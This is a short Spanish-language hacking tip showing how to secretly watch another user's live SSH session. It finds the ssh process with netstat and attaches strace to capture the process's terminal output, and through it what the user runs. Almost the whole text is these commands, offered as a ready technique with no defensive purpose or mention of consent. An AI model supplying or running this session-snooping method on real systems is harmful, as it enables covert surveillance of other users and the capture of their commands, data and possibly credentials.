Vamos a dumpear el proceso ssh que ha ejecutado un usuario desde otra terminal y ver en tiempo real lo que ejecuta.
# Alice ejecuta:
$ ssh -l root 192.168.1.101
# Bob ejecuta :
# buscamos el proceso ssh y su pid
$ netstat -putan |grep -w ssh
# dumpeamos con strace
$ strace -ff -e trace=write -e write=1,2 -p 13196
~ LoRKa